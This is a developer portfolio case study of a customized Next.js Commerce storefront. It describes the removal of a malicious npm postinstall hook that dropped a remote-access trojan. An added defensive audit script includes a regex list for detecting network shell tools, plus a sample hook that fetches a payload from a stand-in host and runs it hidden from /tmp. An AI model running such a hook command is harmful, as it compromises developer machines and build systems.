III. Platform, DevOps & Security · supporting · contributor · client anonymised

E-commerce Storefront — Supply-Chain RAT Caught

Customized fork of Vercel Commerce (the Next.js Commerce starter) running a real online store (UZ): i18n, redesigned checkout, pickup by branch, SEO, CRM scripts. The user is the dominant customizer (~802 commits on top of upstream). A separate, strong story: intercepting a supply-chain attack in the dependency tree.

Status
active
Period
2020-09-21 → 2026-05-26
AI sessions
77
Stack
Languages
TypeScript
Frameworks · Infra
Next.js · Vercel Commerce · GraphQL
§01

Overview

  • What it is: e-commerce storefront based on Vercel Commerce (multi-provider headless commerce: bigcommerce/shopify/saleor/swell/vendure/local). Fork deeply customized for a specific store: Russian localization, reworked checkout (Dodo-style two-column, pickup-by-branch, payment methods), homepage slider/categories, SEO redirects, CRM scripts, deployment (PM2/nginx).
  • Type / status / role: web-app (commerce storefront) / active / contributor (fork: upstream Vercel, Luis Alvarez, Belen ~850 commits; user Davron and name variants ~802 commits of customization; also shahaa/Shahzod ~212).
  • Active period: history starts 2020-09-21 (Vercel upstream) → 2026-05-26; active customization — 2025-2026.
§02

Stack

  • Vercel Commerce (Next.js Commerce): providers in framework/ (bigcommerce active per codegen), GraphQL + codegen (codegen.json, codegen.bigcommerce.json), commerce.config.json.
  • Next.js (app/ — App Router; components + components_new — rewrite), Tailwind, i18n (i18n/, messages/, locales/ — ru/...), next-intl.
  • Infra: deploy.sh, nginx.conf, ecosystem.config.js (PM2), Bun (bun.lockb).
  • Integrations: crm-scripts/, custom backend API (UZ store: branches/pickup/payment).
  • AI: .claude/, .superpowers/ (superpowers skills), CLAUDE.md, SEO-TASKS.md.
§03

What was shipped

Upstream customization (conventional commits):

  • Checkout redesign: Dodo-style two-column, sticky order summary (card), pickup 3-col grid, payment methods 4-col, group line-items, fixes for fixed-header (6f735b96, d261cd18, 43df713e…).
  • Homepage: merging slider and sticky category-nav into a "capsule", native aspect-ratio of slide (layout fixes via plain CSS, since Tailwind 2 has no arbitrary aspect) (feeb7751, ebb0d72a, 35d3bc5c).
  • SEO: redirect /ru[/*] → canonical un-prefixed URL (404 fix per audit) (11cc5633), SEO-TASKS.md.
  • i18n: Russian storefront localization.
  • Security: 2e06e1cc `security: remove malicious postinstall hook (supply-chain RAT dropping /tmp/.sshd via parikhpreyash4/gvfsd-network)`. A dependency's npm postinstall hook was found to drop a remote-access trojan into /tmp/.sshd; the hook was identified and removed (npm supply-chain RAT).
  • Volume: 2175 commits total (with upstream), ~802 by user.
§04

Technical challenges

  • Supply-chain attack intercept (2e06e1cc): detected and removed the malicious postinstall hook of a dependency (parikhpreyash4/gvfsd-network) that dropped a RAT into /tmp/.sshd. Install-time lifecycle scripts run arbitrary shell with the installing user's privileges on every developer machine and CI runner that installs the package, so a hook like this is a full compromise of the build environment, not a browser-side bug. → real security vigilance (dependency audit, response to a supply-chain threat), the strongest and rarest signal for the brand.
  • Headless-commerce customization for a local market: pickup-by-branch, local payment systems, ru-i18n over English Vercel Commerce. → adapting a Western starter kit to UZ realities.
  • Layout under legacy stack constraints (35d3bc5c, 3a01f516): found that components.css wasn't imported in app/layout.tsx (rule never reached the browser); worked around missing arbitrary-aspect in Tailwind 2 via plain CSS. → debugging real CSS-pipeline bugs.
  • SEO hygiene: locale-URL canonicalization, removing 404s per audit.
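The page records only the outcome of the incident above (a postinstall hook dropping a RAT into /tmp/.sshd), not the hook's contents. The following is an added example, written for this page and not code from the storefront repository, of the check a practitioner would run before letting lifecycle scripts execute: walk every dependency manifest, pull out the install-time hooks (preinstall/install/postinstall/prepare) and flag commands that fetch from the network, write hidden files under /tmp, decode embedded blobs, chmod or background a process. The manifests and the "evil" command are constructed samples shaped like the incident, not the real package or payload; the heuristic list is a generic starting point and an assumption of this example, not something the page specifies.

```typescript
// Added example (not from the storefront repo): audit npm lifecycle scripts
// before they run. A postinstall hook executes arbitrary shell with the
// installing user's privileges; that is the foothold described on the page.

type Manifest = {
  name: string;
  version: string;
  scripts?: Record<string, string>;
};

type Finding = {
  pkg: string;       // "name@version"
  hook: string;      // which lifecycle script fired the heuristics
  command: string;   // the script body, for the reviewer
  reasons: string[]; // labels of the heuristics that matched
};

// Lifecycle scripts that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristics for "this script does more than build". Tuned for recall:
// a hit is a review trigger, not a verdict. Assumed list, not from the page.
const HEURISTICS: Array<[string, RegExp]> = [
  ["downloads from the network", /\b(curl|wget|fetch)\b|https?:\/\//i],
  ["pipes remote content into a shell", /\|\s*(ba|z|da)?sh\b/],
  ["writes to a world-writable temp dir", /\/tmp\/|\/dev\/shm\//],
  ["hidden dotfile path", /\/\.[A-Za-z0-9_-]+/],
  ["decodes an embedded blob", /base64|atob\(/i],
  ["marks a file executable", /chmod\s+(\+x|[0-7]*7[0-7]*)/],
  ["backgrounds or daemonises a process", /\bnohup\b|\bsetsid\b|\bdisown\b|&\s*$/],
  ["runs inline node code", /\bnode\s+-e\b/],
];

// Audit one package.json; returns one Finding per suspicious install hook.
function auditManifest(m: Manifest): Finding[] {
  const findings: Finding[] = [];
  for (const hook of INSTALL_HOOKS) {
    const command: string = m.scripts?.[hook] ?? "";
    if (!command) continue;
    const reasons = HEURISTICS.filter(([, re]) => re.test(command)).map(([label]) => label);
    if (reasons.length > 0) {
      findings.push({ pkg: `${m.name}@${m.version}`, hook, command, reasons });
    }
  }
  return findings;
}

// Audit a whole dependency tree (in practice: every node_modules/**/package.json).
function auditAll(manifests: Manifest[]): Finding[] {
  return manifests.flatMap(auditManifest);
}

// Constructed sample manifests (hypothetical packages, not real ones). The
// "evil-helper" hook is shaped like the page's incident: fetch a binary,
// drop it as a hidden file in /tmp, make it executable, background it.
const SAMPLE_MANIFESTS: Manifest[] = [
  { name: "good-lib", version: "1.2.3", scripts: { postinstall: "node scripts/build.js", test: "vitest" } },
  { name: "no-scripts", version: "0.1.0" },
  {
    name: "evil-helper", version: "9.9.9",
    scripts: { postinstall: "curl -fsSL https://example.invalid/payload -o /tmp/.sshd && chmod +x /tmp/.sshd && nohup /tmp/.sshd &" },
  },
  {
    name: "sneaky", version: "2.0.0",
    scripts: { preinstall: "node -e \"eval(Buffer.from('Y29uc29sZS5sb2coMSk=','base64').toString())\"" },
  },
];

// Stand-alone run: print the findings for the constructed samples.
console.log(JSON.stringify(auditAll(SAMPLE_MANIFESTS), null, 2));
```

In a real repo the manifests come from `node_modules/**/package.json` after an install with scripts disabled (`npm ci --ignore-scripts`), so the audit runs before any hook does; Bun, which this repo uses (bun.lockb), only runs dependency lifecycle scripts for packages listed in `trustedDependencies` and a built-in allow-list, which is the same idea applied by default. Packages that pass review are then allow-listed, and the audit is re-run whenever the lockfile changes.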
§05

AI-assisted development

  • Sessions found: 77 .jsonl. .superpowers/ (superpowers skills), .claude/.
  • What was done with AI: checkout/layout/SEO iterations; the dependency audit may also have been AI-assisted (not confirmed by the sessions). Heavy AI assistance for the customization work.
  • Pattern: Claude Code + superpowers skills; task-driven SEO-TASKS.md.
§06

Achievements & metrics

  • Real production store on Vercel Commerce, deeply customized (~802 commits).
  • Supply-chain RAT intercept (security).
  • ru-localization, checkout redesign, SEO.
§07

Contributors

git shortlog · all branches

  1. Dave93 · 836
  2. Belen Curcio · 499
  3. Luis Alvarez · 415
  4. shahzodsalimsakov · 236
  5. cond0r · 60
  6. Franco Arza · 56
  7. Administrator · 49
  8. root · 45
  9. Julián Benegas · 34
  10. ghoskin · 27
  11. Doniman · 23
  12. paco · 20
58 contributors · 46 more not shown · 2,400 commits total
Currently

Open to Senior / Staff engineering roles and selective freelance — production AI, platform, and full-stack work.